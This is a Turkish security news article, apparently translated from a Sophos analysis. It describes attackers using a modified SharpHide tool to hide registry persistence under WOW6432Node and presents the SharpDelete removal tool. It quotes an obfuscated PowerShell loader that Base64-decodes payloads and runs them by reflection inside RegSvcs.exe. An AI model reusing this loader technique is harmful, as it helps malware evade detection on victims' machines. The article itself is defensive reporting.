Tehdit aktörleri, gizli kayıt defteri değerleri oluşturmak için Sharphide aracının değiştirilmiş bir versiyonunu kullanıyor ve tespit ve silme çabalarını önemli ölçüde karmaşıklaştırıyor.
Bu teknik, Windows kayıt defteri yeniden yönlendirilmesini kullanır ve bu gizli kalıcılık mekanizmalarını tanımlamak ve ortadan kaldırmak için standart araçların zorlayıcı olmasını sağlar.
Sharphide, ewhitehats araştırmacıları tarafından belgelenen ve kayıt defteri yoluna iki geniş karakterli (WCAR) nulls hazırlayarak gizli kayıt defteri anahtarları oluşturmayı içeren bir teknikten yararlanan bir araçtır.
.webp)
Sophos’taki tehdit analisti Andrew Petrus, bu yöntemin, null karakterleri düzgün bir şekilde işleyememesi nedeniyle kayıt defteri düzenleyicisindeki girişleri etkili bir şekilde gizlediğini belirtti.
Gizli kalıcılık için modifiye sharpide
Sharphide’nin değiştirilmiş versiyonu, iki baz kodlu ikili dosyayı gizleyen bir PowerShell betiğine entegre edilmiştir.
Burada ilk ikili kötü amaçlı yükü içerirken, ikincisi onu yürütmekten sorumlu bir yükleyici görevi görür.
Yükleyici, PowerShell’in yansıma yeteneklerini dinamik olarak yükleme ve yükü başlatan bir yöntemi kötüye kullanır. RegSvcs.exe işlem.
.webp)
Bu teknik, kötü amaçlı yazılımları meşru bir sistem yürütülebilir içinde çalıştırarak algılamadan kaçmaya yardımcı olur.
$FFSSAA="FGHJTZXCV".replace('FGHJ','').replace('ZXC','')
$JOYR="qQ!!M!!!!E!!!!//8!!Lg!!!!!!!!!Q!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!g!!!!!".replace('!', 'A')
$POOI=$FFSSAA+$iy
$JHFSA =@($POOI)
$POOI2=$FFSSAA+$JOYR+$OE
$LKPL =@($POOI2)
$MNHL=[system.Convert].GetMethod("FromBase64String")
$hgh=$MNHL.Invoke($null,$JHFSA)
$hgh2=$MNHL.Invoke($null,$LKPL)
$GGTI= 'C:\Windows\MiAAcroAAsoft.NEZZT\FraZZmewZZork\v4.0.30319\RegSvcs.exe'
$YOO=[object[]] ($GGTI.replace('AA','').replace('ZZ',''),$hgh)
[Reflection.Assembly]::Load($hgh2).GetType('YES').GetMethod('KISS').Invoke($null,$YO0)
Set-Clipboard -Value "
exit;Yönetici ayrıcalıklarıyla yürütüldüğünde, kötü amaçlı komut dosyası içinde gizli değerler yaratır. WOW6432Node standart yerine şube SOFTWARE dal.
Bu tutarsızlık, Windows’un 32 bit süreçlerden kayıt defterini otomatik olarak yönlendirdiği kayıt defteri yeniden yönlendirmesinden kaynaklanmaktadır. WOW6432Node 64 bit sistemlerde dal.
Bu, gizli değerleri standart Sharphide silme teknikleri ile çözülemez hale getirir.
Bu soruna karşı koymak için Sharpdelete adlı yeni bir araç geliştirildi. Sharpdelete, hem standart hem de yönlendirilmiş kayıt defteri yollarını işleyerek kalıcılık için kullanılan gizli kayıt defteri değerlerini kaldırmak için tasarlanmıştır.
.webp)
Kullanıcıların özel kayıt defteri konumlarını belirtmelerine olanak tanıyarak gizli kalıcılık mekanizmalarının tespitinde ve kaldırılmasında daha fazla esneklik sağlar.
[+] SharpDelete by Andrew Petrus - Tool to delete hidden registry values created by SharpHide
Select a registry path to remove the hidden value:
1. HKCU\Software\Microsoft\Windows\CurrentVersion\Run
2. HKLM\Software\Microsoft\Windows\CurrentVersion\Run (Administrator privileges required)
3. HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run (Administrator privileges required)
. Enter a custom registry path (Administrator privileges required for HKLM and most HKCR paths)
Enter your choice: 3
[+] Deleting hidden registry key in HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
[+] Key successfully deleted.Bu yöntemler, Windows’un kayıt defteri girişlerini nasıl işlediği, algılama ve kaldırmayı zorlaştıran güvenlik açıklarından yararlanır.
Sharpdelete gibi araçlar, ortaya çıkan tehditlerle mücadele etmek için siber güvenlikte sürekli inovasyonun önemini gösteren bu sorunlara çözümler sunar.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free